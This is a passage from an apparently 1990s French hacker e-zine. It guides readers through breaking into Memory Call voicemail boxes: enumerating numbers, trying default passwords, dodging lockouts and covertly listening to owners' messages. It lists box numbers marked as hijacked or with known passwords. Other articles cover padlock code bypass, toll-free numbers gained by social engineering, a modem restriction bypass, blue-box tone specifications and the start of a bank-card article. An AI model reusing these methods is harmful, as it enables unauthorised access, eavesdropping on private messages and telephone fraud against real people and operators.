STE:NGR=1+8+7+6+12,PER= : ‚dition des statistiques TYC=MIC : service FTB LMR : Liste de tous les mobiles cr‚‚s sur le relai CDE FTE : Commande d'‚dition des fichiers temporaires FSM 001 FSM 0XX XX : ‚dition des fichiers sur bandes selon les mois (XX XX) FSM 001 FSH 0YY YY : meme chose selon les semaines (YY YY) ABS : sauvegarde de tous ses fichiers. LST : red‚marre l'UTME + arret de liaison +pr‚saturation FSM MOR : mise en suivi de mobiles MOP : Idem RSR : Rapatriement de fichier de suivi de mobile CAI : commande de listage LSU : statistiques SUE : pour rapatrier un fichier FSE CSR : Cr‚ation de station radio CQP : cr‚ation de voie banalis‚e LEU : donne l'etat des chaines ECE : ‚dition Commandes sans explication: VE PERFID LMS DIR,VE LAR LGR PEP RHM LMA/LMF=.... RHM "LAR" RHM LEU FJA LDI BTR LQR AUE LTL CNX Fichiers utilis‚s par le logiciel Matra (CGM): CRAA CRI CRAD FER FTJ TAX FTYPUT TOTAL OOCRAA NBBL LPI ABO CAD FICBDF FSE : Fichier de stat Systeme GECOS: ------------- Pour se logger on tape L Sur les systems FT, il faut taper: L SYSTEM Il y a aussi generalement sur les systemes FT le programme ORACLE. Et il semblerait que les fichiers du logiciel MATRA (CGM) soient compatibles ORACLE. Le mot de la fin: ---------------- Eh bien, j'espŠre que ca vous permettra de pas vous retrouver bˆte devant le prompt de ce systeme si jamais vous y arrivez un jour... En tout cas, j'espŠre pouvoir vous donner plus d'info sur le GECOS d'ici quelques temps... Have Phun! ++ NeurAlien _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ The B.S.: Cet article est purement informatif et n'incite en aucun cas a un quelconque acte interdit. L'auteur ne pourra etre tenu pour responsable de toute mauvaise utilisation de cet article. Les informations de cet article sont publiques et ne peuvent en aucun cas constituer un motif pour une quelconque action en justice contre son auteur. _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ -%!% N0 Way %!%- Volume I, Num‚ro 2, Partie 2.8 ##################################### ##################################### ## ## ## ## ## VMB's sur Memory Call ## ## ## ## (05.90.31.07.) ## ## ## ##################################### ##################################### Et voila, la liste des BALs sur Memory Call! Enjoy inter-continental phreaking! :) +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +-+ +-+ +-+ Another Phile By +-+ +-+ +-+ +-+ --==<< CrAzY tOnE >>==-- +-+ +-+ +-+ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ For eventual US readers: This is a list of VMB's on the Memory Call Service, I don't know it's number in US, but to reach it from France, you have to dial the toll free 05.90.31.07. Bon, le numero, comme on le sait deja, est 05.90.31.07. ^^^^^^^^^^^^ Kelkes indications pour se connecter: 1) Ceci est un VMS (Vocal Mail Service) donc, rien ne sert de l'appeller par modem. Appellez-le de chez vous, ou plutot faites comme moi, callez de la cabine telefonik, c'est moins dangeureux, du moment qu'il y a poa besoin de modem pourquoi risquer d'etre trace? 2) Il faut appeller EN DEHORS des heures d'ouverture des bureaux a savoir entre 9 a.m. et 5 p.m. en USA, donc en France avant 14 heures ou apres 00 heures (a peu pres) ou le week-end, kan c'est ouvert 24/24. 3) Si vous tombez sur un operateur (trice) - raccrochez, pour ne pas attirer de soupcons inutiles. Donc, une fois que c'est un REPONDEUR ki vous repond, c'est bon, vous pouvez y aller. 4) Le repondeur decroche au bout de 5 sonneries d'habitude. 5) Une fois que vous entendez le repondeur, il doit vous dire 'Leave us a message after the tone' ou kelke choz dans le style. Appuyez une fois sur ETOILE (*), il demande: - 'Please dial the number of the person you wish to call' > Si vous voulez deposer un message a kelkun, faites: 22 + le numero de la BAL du destinataire puis suivez les indications. (Il doit surement exister d'autres moyens de deposer un msg, mais j'ai pas vraiment cherche...) > Si vous voulez acceder a votre BAL, faites: (#) ou (*) puis entrez le numero de votre BAL et puis le mot de passe suivi de (#) Attention, au bout de 3 tentatives sans succes d'entree du numero de la BAL successives, il vous deconnecte... Meme choz pour le code. Mais le systeme etant tres con, le compteur des tentatives est remis a zero a chaque fois que vous entendez 'Welcome to Memory Call Service' (on verra ca plus loin), donc on peut hacker sans rappeller toutes les 30 secondes! 6) Si vous n'avez poa de VMB, allez voir directement le point 8, sinon, lisez la suite. 7) Une fois que vous etes dans votre BAL, vous pouvez faire un certain nombre de choses, dependant du type de votre VMB (1) ou (2), (2) etant bien plus evolue. Mais en gros, vous pouvez changer le mot de passe, enregistrer votre nom, enregistrer vos greetings (msg d'accueil) lire les messages et envoyer des messages (si type (2), sinon fo envoyer comme c'est explique en 5)). Allez lire le point 9 directement. 8) Bon, vous avez poa de BAL...snif... le premiere solution est d'en demander une a kelkun ki en a plusieurs, au moment ou j'ecris ces lignes, les personnes succeptibles d'avoir des BALs a refiler sont COOLHP et moi, qu'on peu joindre soit sur Memory Call en 2613631 soit sur Likid en 5100. En ce qui concerne COOLHP, je sais poa si il voudra refiler des BALs, alors bon je donne kan meme son num sur Memory Call: 2654549. Bon, si personne ne vous donne de BAL, allez lire le point 9, koike meme si on vous en donne une, allez le lire. 9) ** How to hack Memory Call ** Bon, hacker ce truk c'est poa bien compike, la preuve: j'ai hacke une 20-aine de Bals de types (1) et (2) a ma premiere connexion. Le truk le plus dur consiste a trouver une BAL valable. Le mot de passe est le numero de la BAL si cette BAL n'est pas encore occupee, mais deja assignee. Parfois, j'ai trouve des pass des BALs occupees en essayant des truks o pif, mais c'est poa tres souvent, alors si vous ne trovez le mot de passe d'une bal du premier coup, laissez beton, car vous serez obliges de rappeller tout les 3 movais mots de passe, il est plus rapide de se trouvez une autre BAL avec un mot de passe bidon. Les BALs sont codes sur 7 chiffres allant de 0 a 9, toutefois, il n'y a pas de BALs inferieures a 222-2222 au moment ou j'ecris ca, d'ailleurs toutes les infos contenus dans ce fichier ne sont valables a coup sur que pendant une certaine periode apres l'ecriture, chez poa kelkes semaines ou kelkes mois, aucune idee en fait. Ainsi, la BAL la plus grande est 999-9999, bien k'elle ne soit pas assignee pour l'instant. Comme je l'avais dit, le systeme est tres con, a savoir, il vous dit, kan vous entrez votre num de BAL (pas de code!) il vous dit kan vous faites une erreur!!! ce qui rend _facile_ de trouver les nums de BALs valables. Toutesfois, il ne le dit qu'apres que vous ayez entres 3 chiffres, ou ayez entendu trop longtemps sans rien entrer. Exemple: (BAL valable: 261-3631) J'entre 260. Il me dit rien kan j'entre le '2', ni kan j'entre le '6' mais kan j'entre le '0' a la fin, il me dit 'not recognized' car il n'y a donc aucune BAL qui commence par 260. Bon, j'entre donc 261. il ne dit rien, car attend les chiffres restant, car il existe une ou plusieurs BALs qui commencent par 261. J'entre donc 0, il me dit 'non recognized', car il n'y a aucune bal qui commence par 2610, par contre il y'en a une qui commence par 2613, donc kan j'entrerai 2611, il me dira non, 2612 non plus, 2613 il dira rien kar attendra d'autre chiffre... voila... et c'est pareil pour les quatres chiffres qui suivent le num du groupe. (num du groupe = 3 premieres chiffres du num de la BAL, voir plus loin). Bon, il se trouve qu'il y a un certain nombre de BALs qui sont deja assignes, mais pas visites par kikonk, donc il contiennent le 'temporary password', a savoir le numero de la BAL!!!!!!! Ils le font expres!!! Ils sont con!!!!! Bon, bin vous entrez donc le temporary password, si il dit 'Thank-you' c'est que c'est bon, vous entrez le pass que vous voulez installer, votre nom, greetings, et hop, une BAL toute fraiche pour vous. Alors, la est l'interessant, si il vous dit en denombrant les options disponibles "Send a Message" c'est que vous avez une BAL de type (2), vous avez toutes raisons d'etre contents. La BAL de type (2) vous permet de reconnecter en appuyant sur (5) dans le MAIN MENU. Et donc reinitialiser le compteur des tentatives sans succes!!! Pour hacker sans rappeller: - hacker une BAL de type (2); - scanner les bals en consultant a chaque 2eme tentative sans succes votre BAL de type (2) et en se reconnectant en appuyant sur (5); Voila... 10) Alors, pour les groupes... Il se trouve que les BALs sont souvent groupees, en ayant en commun les 3 premieres chiffres du num de BAL, donc si vous trouvez un num de group (les 3 premieres chiffres) valide, scannez le a mort, il vous rapportera peut-etre, si on l'a poa deja scanne :) plein de BALs. 11) Si vous trouvez un mot de passe d'une bal utilisee par kelkun, ne le changez surtout pas, car: - Si c'est un occupant legitime, il va le dire a l'operateur, et vous perdrez la BAL definitivement; - Si par contre, vous changez poa le code, vous pourrez vous amuser a ecouter ses messages sans qu'il s'en apercoive, car les messages ne sont pas markes lus! Si jamais vous trouvez le mot de passe de l'operateur, dont la BAL est 9995555, ne foutez rien en l'air, allez partout, mais n'effacez rien, ne modifiez pas trop, sinon il va s'en remarker et finito el passwordo... Les mots de pass courants: - le num de la BAL - 12345 - 123456 Et n'importe quoi qui vous passe par l'esprit... @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Bon allez, now c'est la liste des Bals... ************** ** LEGENDES ** ************** (1) Type 1 (2) Type 2 (!) Un hacker qui l'occupe (francais ou US...) (+) Occupant legitime, mais on connait le pass hehehe (-) Occupant legitime, mais on connait poa le pass bouhooOOooOOoo (*) Operateur! C'est en fait une femme... øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøø (-) 222-2222 (!1) 225-2657 Ma BAL de secours! (!1) 242-9552 TraXX (-) 252-9591 (-) 260-1225 (!2) 261-3631 Une BAL a moa (-) 262-1124 Une certaine Marylin (!1) 265-4549 COOLHP (-) 268-2110 (!2) 279-1721 Encore a MoAaAaAaA (-) 281-1897 (-) 282-1608 (-) 287-1123 Transaction NetWork (-) 291-0521 >> (+1) 291-0603 (-) 291-0746 (-) 291-0851 (-) 291-0969 (!1) 291-0977 Eh oui! encore a moi... (-) 291-0999 (!2) 291-1252 Toujours a moi (-) 291-1325 (-) 291-1585 (-) 291-1624 (+1) 291-1670 (-) 291-1713 (!1) 291-1825 A moi (!1) 291-2005 Zarbi: 8 messages kan je l'ai ouverte... (+1) 291-2040 On peut ecouter leurs msg! (-) 292-1113 Yougada Technologies (-) 296-1111 (!2) 321-5235 Je suis passe aussi par la... (!1) 329-9797 Jedi (!1) 353-9015 Rebel-94 (!1) 356-5314 Hpreg (!1) 363-0053 Thesee (-) 367-8812 (!1) 388-4356 A moi (!1) 396-2082 Idem (-) 443-6111 Yougada NetWork (!2) 444-4411 A moi (-) 448-1112 Cathy (-) 471-0393 George (!1) 491-8845 A moi (?) 523-2 Seulement 4 digits !!!????!!!! (!1) 555-5555 A moi... (<->) 587-7500 C'est ptet' un hacker? USA? autre? (-) 636-5664 Isabella (!1) 645-9117 A moi (!1) 695-4490 Pareil... (-?) 696-8832 Alex Thompson. EN FRANCAIS!! Hacker? (!2) 886-0052 COOLHP (?) 886-0803 (?) 886-0509 (?) 886-0322 COOLHP -%!% N0 Way %!%- Volume I, Num‚ro 2, Partie 2.9 Cet article est un article de CORE-DUMP, journal Underground Hacker jamais diffuse publiquement. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = CORE-DUMP | Volume I | Issue 2 | Phile 7 | [NeurAlien] 05/05/92 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ____________ / __________ \ / / \ \ | | | | | | | | __|_|___________|_|__ | o F T H o | | ___ ___ ___ ___ | | [1] [3] [9] [7] |]] | [2] [4] [0] [8] |]] | [3] [5] [1] [9] |]] | [4] [6] [2] [0] |]] |____________________| UN-lock the FTH numerical Lock Par NeurAlien Intro: En lisant les nouveaux Phracks ou le "2600 magazine" exposait ses dernieres passes (ils avaient reussi a trouver une methode pour ouvrir en trouvant le code des serrures SIMPLEX qui equipent toutes les boites "FEDERAL EXPRESS"... Bravo a eux... (au fait, je ne sais toujours pas comment ils font...)), eh bien je me suis dit: "Pourquoi moi je ne pourrais pas trouver aussi une methode pour ouvrir les cadenas a codes???" Le soir meme (c'est a dire aujourd'hui...), je me suis precipite apres les cours dans une quincaillerie et apres une petite dose de "Social Engineering", je me suis procure un cadenas a code numerique (je n'ai pas dit digital...) de chez FTH. Vous pouvez trouver ce cadenas n'importe ou a mon avis. Je ne sais pas en tout cas s'il est frequemment utilise. Bref, au bout d'une bonne demi-heure pendant lesquelles j'ai regarde comment le cadenas fonctionnait, j'ai trouve un moyen pour trouver le code. Et le VOICI : Principe de ce cadenas: ---------------------- Il est consitue de 12 parties qui nous interressent: - un anneau de securite qui est (generalement) sur tous les cadenas ;) - un cliquet qui permet au pene de se retirer du cadenas quand on a le code et que l'on veut changer ce dernier ou voir les bagues. - 4 "viroles" c'est a dire, les quatres annaux en metal jaune qui tournent et qui permettent de positionner le code (numrotes de 0 a 9). Ce sont juste des roues dentees creuses pour recevoir les bagues. Elles sont logees dans le cadenas en lui meme dans les logements prevus a cet effet. - 4 bagues situees a l'interieur des viroles (ce sont elles qui composent la cle, le code. (il faut pour les voir: 1/ mettre le bon code en face de la barre horizontale du cote du cadenas ou il y a inscrit "FTH" 2/ tirer sur le pene quand il y a le bon code 3/ lever le cliquet 4/ enlever totalement le pene du cadenas 5/ enlever une des viroles, elle est composee de deux parties, la virole en elle meme qui est l'anneau le plus grand et la bague qui est l'anneau le plus petit (le pene passant au milieu de ce dernier). - un pene (prononcer PAINE, il y a un accent grave) qui sert a ouvrir ou a bloquer le cadenas. Il est situe sur la partie droite du cadenas et a cette forme quand il est retire du cadenas: _____ |__ | <-- partie bloquant | | l'anneau de ___ ___ ___ | | securite __/|___| |___| |___| |____| | (__________________________ | | | |_| \___________ ___________/ \/ Partie qui est normalement dans le cadenas. C'est la partie qui bloque les viroles. - Le cadre du candenas (le cadenas). H2U : How To Unlock: ------------------- Eh bien c'est simple: il faut trouver le code... (J'imagine ce que vous vous dites dans votre tete: haha, marrant celui la, on a pas 3 ans pour essayer les 10 000 combinaisons.) Bon, eh bien, pour trouver ce code, j'ai decouvert un petit truc marrant: A la fabrication, ils ne sont pas surs au millimetre pres que le pene rentre dans le trou du cadenas. Donc ils donnent des dimensions legerement inferieures au pene par rapport au modele initial ce qui donne un peu de jeu au pene. Ainsi, on peut faire bouger le pene. Deja, prenons le cadenas dans la bonne position: mettez le de telle maniere pour pouvoir lire FTH verticalement sur la gauche et le pene en haut du cadenas. (cad, anneau de securite sur la gauche). D'autre part, pendant toute l'operation, il ne faut que aucun poids ne pese sur l'anneau de securite (ex: ce qui est attache). Le cadenas DOIT ETRE V E R T I C A L ! Donc, il ne faut absolument pas maintenir le cadenas dans la bonne position en le tenant par l'anneau de securite. Ensuite, il faut avoir une source de lumire vive pour cette operation (une lampe de poche large, le soleil, une ampoule forte). On placera cette derniere dans la bonne position derriere le cadenas de telle sorte que l'on voit des fentes de lumiŠre au dessus des viroles \/. Juste au dessus de chaque partie dentelee de chaque virole, on doit voir une fente de lumiere meme si l'espace est tres petit (cela est primordial donc une bonne vue est necessaire.) Si on essaye de soulever un peu le pene (utiliser un chewing gum par exemple pour une meilleure prehension), on va voir la partie centrale de la raie de lumiere s'obscurcir. Si cela se produit, c'est que le numero de la virole place pour le code n'est pas le bon !!! Sinon, la raie de lumiere reste la meme... et alors la, le code de la virole concernee est bon. Il faut essayer plusieurs fois pour bien en etre sur ! Donc, la bonne methode est de faire ca en mettant successivement comme code 0000, 1111, 2222, 3333, 4444, 5555, 6666, 7777, 8888, 9999. Une fois qu'on a trouve sur une virole un bon chiffre, on le laisse tel quel, et on continue de chercher avec les autres viroles. Et au bout du compte, BINGO... Vous avez ouvert le cadenas ! Si vous n'y arrivez pas la premiere fois, reessayez, c'est dur au debut de bien voir quand la raie de lumiere s'obscurcit !!! Explication: ----------- Le pene ayant toujours du jeu vertical, on peut le faire bouger donc on fait bouger (se deplacer vers le haut de facon plus precise) les excroissance sur le pene lorsque l'on souleve puis rabaisse ce dernier. Ainsi, si ces excroissances sont en face de l'encoche de la bague a l'interieur de la virole (c'est a dir que le chiffre sur cette roue est le bon), la bague ne se souleve pas quand on souleve le pene et ainsi la raie de lumiere reste pareille. Par contre, si ce n'est pas le bon chiffre, la bague est remontee par les excroissance et ainsi obscurcit tout ou partie du milieu de la raie de lumiere. Alors maintenant, Go 4 it! ++NeurAlien. The Bull-Shit: Ce texte et tout ce qui pourrait en decouler ne pourront etre retenus contre moi. Ce n'est que de l'information pure et donc non sanctionnable. FTH est (certainnement) une marque deposee. PS from '94: And if you don't wot a pene is, get a life ! ;)) haha -%!% N0 Way %!%- Volume I, Num‚ro 2, Partie 2.10 Cet article est un article de CORE-DUMP, journal Underground Hacker jamais diffuse publiquement. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = CORE-DUMP | Volume I | Issue 2 | Phile 5 | [NeurAlien] 14/05/92 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *--*--*--*--*--*--*--*--*--*--* | | | International Toll Free | * * | Phone Numbers In France | | | * By * | NeurAlien | | | *--*--*--*--*--*--*--*--*--*--* Intro: Alors voila, France TELECOM est tres tres gentille... Je leur ai demande des infos, et hop, thanx 2 social engineering, me voila en possession de ces infos qu'ils ne veulent pas trop distribuer... LIBERTE D'INFORMATION, Merci... B.S.: Ces informations m'ayant ete donnees par un technicien de France Telecom, je ne pourrais etre en aucun cas poursuivi par France Telecom; Ces informations etant dans certainnes documentations PUBLIQUE mais rarement distribuees de France TELECOM. Je ne pourrais etre tenu comme responsable d'un acte ou fait consecutif a la lecture de cet article. Cet Phile vous presente ce qu'est le numero vert International (toll free number) et ses acces indoor ou outdoor (cad en france et ailleurs). >Le principe: Un numero vert est en fait un numero dans une liste de numeros au central de votre coin. Cette liste contient: le numero vert, le numero normal correspondant et la zone d'influence plus quelques autres informations je suppose. Quand on decroche le telephone et que l'on compose un numero vert, le central doit aller verifier que ce numero existe dans sa liste, marque la communication comme non-payante pour l'appelant, verifie que l'appelant est la zone d'influence du numero vert (cad que l'utilisateur a le droit d'y acceder du point geographique d'ou il appelle) et appelle le numero correspondant dans sa liste. Pour le numero vert, c'est la meme chose sauf que c'est vers l'etranger que la communication est orientee. (c.a.d que le numero normal correspondant au numero vert international est a l'etranger.) >Forme du numero vert international en indoor: Le numero vert international commence toujours par 0590 puis un indicatif du pays puis l'adresse propre a l'abonne au numero vert international situe a l'etranger. Dans beaucoup d'autres pays il existe des liens telephoniques 'toll free numbers' vers la France. >Les indicatifs indoor: Je ne les ais pas tous mais j'ai reussi a recuperer les principaux. Les 'x' dans la liste sont le nombre de digits qui doivent suivre l'indicatif. N'oubliez pas qu'un numero vert est toujours compose de 8 chiffres comme tous les numeros telephoniques de France. ------------------------------------------------------------------------------ Pays: Indicatif Commentaire ------------------------:-----------------------:----------------------------- Allemagne : 05 90 4x xx : Belgique : 05 90 7c xx :c=tout sauf 3 Danemark : 05 90 52 xx : Espagne : 05 90 3c xx :c=tout sauf 4 Finlande : 05 90 55 xx : Hong Kong : 05 90 94 xx : Italie : 05 90 04 xx : Japon : 05 90 9c xx :c=tout sauf 4 Luxembourg : 05 90 69 xx : Netherlands/Pays Bas : 05 90 6c xx :c=0..8 Norvege : 05 90 57 xx : Portugal : 05 90 73 xx : Suede : 05 90 34 xx : Suisse : 05 90 8x xx : meme indicatif que l'UK UK : 05 90 8x xx : meme indicatif que la Suisse USA AT&T : 05 90 1x xx : AT&T : 05 90 21 xx : AT&T : 05 90 23 xx : AT&T : 05 90 25 xx : AT&T USA MCI : 05 90 27 xx : MCI : 05 90 28 xx : MCI : 05 90 29 xx : MCI (npa=216) USA Sprint : 05 90 02 xx : Sprint Pour les USA, on ne sais pas trop dans quel ‚tat/ville/companie on tombe. Mais certainnes fois, on recoit un message a la place d'une quelconque sonnerie: "2 1 6, Sorry, the number you've dialed is not in service, please, check your number and dial again. Otherwise, try to reach a MCI Operator." Dans ce message vous apprenez que la serie dans laquelle se situe votre numero appele est dans l'etat/l'area code de NPA 216 et que la compagnie qui gere la communication est MCI. Pour la liste des NPA, voyez une autre H/P-Phile. Si vous en avez d'autre, dites le moi. >Toll Free Numbers Outdoor: Ce sont des numeros verts dans certains pays pour appeler vers la France. ------------------------------------------------------------------------------ Pays: Indicatif Commentaire ------------------------:-----------------------:----------------------------- Allemagne (DE) : 0130 81 xxxx : Anciennement RFA Australie (AU) : 0014 800 125 xxx : Belgique : 11 xxxx : Canada (CA) : 1 800 x 6343 xx : Danemark (DK) : 80010 xxx : Espagne (SP) : 900 9x 33 xx : Etats Unis (US) : 1 800 xxx xxxx : (alors la, c'est epars...) Finlande (FI) : 9 800 133 xx : Hong-Kong (HK) : 800 33 xx : Hongrie : 00 800 xxxxx : Irlande : 1 800 55 xxxx : Italie (IT) : 1 678 xxxxx : Japon (JP) : 00 31 33 xxxx : Japon (JP) : 00 44 22 33 xxxx : Luxembourg : 0 800 xxxx : Norvege (NO) : 06 022 xxxx : Portugal : 05 05 33 xxx : Royaume-Uni (UK) : 0 800 89 xxxx : Singapour : 800 xxxx : Suede : 020 795 xxx : Suisse : 1 55 xxxx : Note sur les toll free numbers: Apparemment, la cause du changement de la signalisation en DTMF inter-centraux qui permettait a l'origine l'utilisation de la blue boxe serait due a des Hackers et des Phone Phreak qui auraient utilise les Toll free numbers pour arriver gratuitement sur le reseau francais. ThE EnD: ------- Eh bien, j'espere que vous avez un bon accent et de bonnes connaissances en langues etrangeres. Notez que les numeros de cette derniere liste de pays sont uniquement accessibles en etant interne au pays (sauf si vous avez un PABX dans le pays designe). Quand aux sigles entre parenthese, c'est conforme a l'ISO xxxx (vous voulez vraiment le xxxx ;) ???), ou si vous preferez les domains d'internet. >Les coordonnees du centre qui s'occupe de cela: DIRECTION DES RESEAUX EXTERIEURS 246 RUE DE BERCY 75584 PARIS CEDEX 12 Tel: 05 19 33 33 (ps: 05 19 xx xx ce sont tous les services de la DTRE, Direction des Telecommunications des Reseaux Exterieurs.) Mais n'allez pas leur demander comme ca en etant un particulier: quel est l'indicatif numero vert international pour Taiwan ou pour la Coree du Sud (si vous avez ces 2 derniers en tt cas, ca m'interresse...). Vous vous feriez jeter. Bon social-engineering. Informativement votre, ++NeurAlien -%!% N0 Way %!%- Volume I, Num‚ro 2, Partie 2.11 %=%-%=%-%=%-%=%-%=%-%=%-%=%-%=% %=%- Telecom Information %=% %=%- Par %=% %=%- NeurAlien %=% %=%-%=%-%=%-%=%-%=%-%=%-%=%-%=% >>>>>Informations g‚n‚rales et diverses sur le t‚l‚phone, les modems etc...<<<< > Modem & restrictions: -------------------- Vous savez, France Telecom est une sale soci‚t‚ de rats puants. Vous savez aussi qu'ils veulent limiter la technologie … leur propre usage. Un exemple, l'agr‚mentation des appareils t‚l‚phoniques se fait uniquement si cet appareil n'est pas trop performant. Apparemment, les modems USR ‚taient trop performant (ainsi que la pluspart des modems). Ils composaient trŠs vite, pouvait rappeler imm‚diatement un num‚ro et plein d'autres petites fonctionnalit‚s de ce type existaient. FT a vu la dedans une menace envers son monopole et hop, pour ˆtre agr‚‚ il faut int‚grer une periode d'attente entre la composition de 2 num‚ros et aussi comporter une blacklist qui bloque un num‚ro si celui ci est rappel‚ sans succes trop souvent. N0 WAY vous fournit des aujourd'hui un moyen de bypasser cette protection! Connectez vous … votre modem et tapez: atz at s40=2 at &w (pour sauvegarder) Et voila, maintenant vous enculez en profondeur FT !!!! hahahaha... (teste et approuve sur USR Courrier Terbo V32Bis) Je ne sais pas si les mecs de USR sont au courant de ca mais c'est trŠs bon. Il est trŠs interressant de bidouiller son modem avec les "reserved" register. Je donne la liste des ces registers ou des bits reserv‚ de certains registres: - S13 : Registre batard pour faire des actions au startup etc... le bit 128 de ce registre est "Custom Application Only" Doc Default: 0 French Default: 0 - S14 : Dans la s‚rie des registres de parametrage de mode, on peut imaginer que ce registre sert … la mˆme chose. le registre entier est reserv‚. Doc Default: 0 French Default: 0 - S15 : Param‚trage des modes du modem. le bit 128 de ce registre est "Custom Application Only" Doc Default: 0 French Default: 0 - S16 : Paramˆtre pour tester son modem: Dial test, Loopback... les bits 4 (16), 5(32) et 6(64) de ce registre sont reserv‚s. le bit 7 (128) est carrement pas liste. Doc Default: 0 French Default: 0 - S17 : Toujours dans la s‚rie des bits de test, ca doit ˆtre ca! le registre entier est reserv‚. Doc Default: 0 French Default: 0 - S20 : Dans la s‚rie des registres utilis‚s comme timer, ca doit ˆtre la mˆme chose. le registre entier est r‚serv‚. Doc Default: 0 French Default: 0 - S25 : Dans la s‚rie des registres utilis‚s comme timer, ca doit ˆtre la mˆme chose. le registre entier est r‚serv‚. Doc Default: 0 French Default: 5 - S27 : Registre qui permet d'activer/desactiver des vitesses et des modes. le bit 6 (64) est r‚serv‚. Doc Default: 0 French Default: 1 - S30 : Registre NON LISTE ! Dans la s‚rie des modes / avant le registre de d‚termination de l'action d'appui sur VOICE/DATA. French Default: 0 - S31 : Registre NON LISTE ! Dans la s‚rie des modes / avant le registre de d‚termination de l'action d'appui sur VOICE/DATA. French Default: 0 - S33 : Les bits de 1 … 7 (valeurs 2 … 128) ne sont pas list‚s dans la doc. Le bit 1 sert a activer le mode HST cellular. Doc Default: 0 French Default: 0 - S35 : Non list‚ French Default: 0 - S36 : Non list‚ French Default: 0 - S37 : Non list‚ French Default: 0 - S39 : Non list‚ French Default: 11 - S40 : Non list‚ French Default: 0 Sert entre autre a bypasser les limitations FT ! - S45 : Non list‚ (dans la s‚rie des timings) French Default: 0 - S46 : Non list‚ (dans la s‚rie des timings) French Default: 0 - S47 : Non list‚ (dans la s‚rie des timings) French Default: 0 - S48 : Non list‚ (dans la s‚rie des timings) French Default: 0 - S49 : Non list‚ (dans la s‚rie des timings) French Default: 0 - S50 : Non list‚ (dans la s‚rie des timings) French Default: 0 - S51 : Sert a mettre en route ou disabler les modes MNP/V42 bis Les bits de 3 … 7 (valeurs 8 … 128) sont r‚serv‚s. French Default: 0 - S52 : R‚serv‚ French Default: 0 - S53 : Les bits de 3 … 7 (valeurs 8 … 128) ne sont pas list‚s. French Default: 0 Amusez vous … les bidouiller et vous aurez des resultats ‚poustouflants! Mais la rŠgle d'or pour comprendre est: Un seul changement … la fois et observez TRES BIEN les effets! > Bi-Bop: ------ Il y a eu un gros tapage mediatique sur le Bi-Bop et rien au niveau technique. Arghhh... Horreur, reveillons nous! Il est temps d'ouvrir notre champ de conscience aux champs hertziens ;) Caracteristiques techniques du Bi-Bop SAGEM: ------------------------------------------- Compatible CAI Norme ETSI 300131 Conversion analogique/numerique: CODEC/ADPCM Vitesse d'emission: 72 Kbit/s Frequence: 864.1 … 868.1 MHz Espacement entre canaux: 100 KHz Nombre de canaux: 40 Sensibilit‚ recepteur: 45 dB æV/m pour 0.001 BER (??????) Parasites et rejection d'image: MPT1375 (CAI) Intermodulation: 40 dB Niveau de sortie HF: 10mW ERP maximum Tolerance de frequence: +/- 10kHz Les Bi-Bop de la SAGEM sont livres avec plusieurs numeros: --------------------------------------------------------- S/N: (Serial Number?) : 10 caractŠres alphanum‚riques ELEC S/N: 12 chiffres Code de securite principal: 6 chiffres GPID: 16 caractŠres alphanum‚riques Si ca peut aider quelqu'un c'est cool... Si ca peut donner une piste aux joyeux electroniciens qui lisent N0 Way, ca serait cool de recevoir un article plus complet sur le Bi-Bop. (et sa norme, le CT2 parait il!) > Blue boxe: --------- Information fournie par Arscene. Specification de SOCOTEL: Hz 900 1100 1300 1500 1700 700 1 2 4 7 11 900 3 5 8 12 1100 6 9 kp1 1300 0 kp2 1500 st Hangup: 3850 Hz Timings: digit 0-9. Length: 60ms +/- 7ms Delay : 60ms +/- 7ms 11 12 Length: 100ms +/- 15ms Delay : 60ms +/- 7ms kp1/2 & ST Length: 100ms +/- 15ms Delay : 60ms +/- 7ms Pulse Lenght: 35 +/- 5 Delay : 35 +/- 5 Th‚oriquement utilis‚e en France et en Espagne. Le Hangup est "outband". |\/| |/\| STAY HARD |/\| |\/| NeurAlien -%!% N0 Way %!%- Volume I, Num‚ro 2, Partie 2.12 *********************************** * CARTE BANCAIRE VISA * * Par * * D. O'CONNELL * * Pour * * NO-WAY * *********************************** Ce texte vous es propos‚ … titre purement informatif, je d‚gage toutes responsabilit‚es quand … l'utilisation que vous pouvez en faire. I G‚n‚ralit‚es: Une carte bancaire est un moyen de paiement ‚lectronique, pour ce faire on dispose de trois solutions, la puce de la carte, les pistes magn‚tiques ou simplement le num‚ro de carte en cas de t‚l‚paiement (pour les ignares ‡a veux dire paiement … distance). Le plus sur des moyens ‚tant l'interrogation de la puce, c'est ce qui est utilis‚ pour les paiements en magasin quand vous tapez votre code. Les pistes magn‚tiques sont interrog‚es lors d' un retrait dans un DAB (Distributeur Automatique de Billets) sans v‚rification de la puce. Le numero de carte est utilis‚ par les anciens "terminaux" dit fer … repasser o— l'embossage de la carte ‚tait tranf‚r‚ par carbonne et pour les prises de commande par t‚l‚phone. II Les pistes magn‚tiques Les cartes VISA comportent plusieurs pistes le standard ISO en definie 3, les cartes fran‡aises en utilisent 4 ISO1, ISO2, et 2 autres propre … la France T2, et T3 bravo la normalisation... Cependant pour des raisons de compatilit‚e et de co–t une seule et utilis‚e … la fois g‚n‚ralement ISO2 mais parfois ISO1 dans les anciens 